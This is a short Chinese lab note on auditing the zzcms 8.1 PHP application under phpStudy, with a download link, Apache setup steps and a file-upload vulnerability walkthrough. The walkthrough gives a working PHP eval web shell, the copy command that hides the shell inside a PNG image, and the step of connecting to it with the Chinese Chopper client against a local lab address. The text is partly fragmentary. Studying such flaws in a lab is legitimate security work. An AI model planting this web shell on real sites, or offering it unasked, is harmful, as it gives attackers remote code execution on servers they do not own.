下载
https://pan.baidu.com/s/1GuiXDTMl8HbOQ1yT_ek_vg
提取码:jox4
安装搭建教程 PHP代码审计-从安装到开始_1_佛性死磕的博客-CSDN博客
1、Apache\conf下的vhosts.conf,删除下面这句,和下面的options开头的。
2、再设置打开phpStudy->其他选项菜单->phpStudy设置->允许目录列表打上勾。再设置E:\phpStudy\Apache\conf下的httpd.conf,去掉# LoadModule vhost_alias_module modules/mod_vhost_alias.so
解决无图方法:
1、文件上传漏洞
先注册一个用户
admin-admin
上传点 http://192.168.100.136/zzcms8.1/uploadimg_form.php
php图片马制作
<?php
@eval($_POST['123456']);
?>
copy 2.png/b + 1.php shell.png
接下来就是菜刀连接
漏洞的根源:Apache会把phtml后缀的文件当成php文件来执行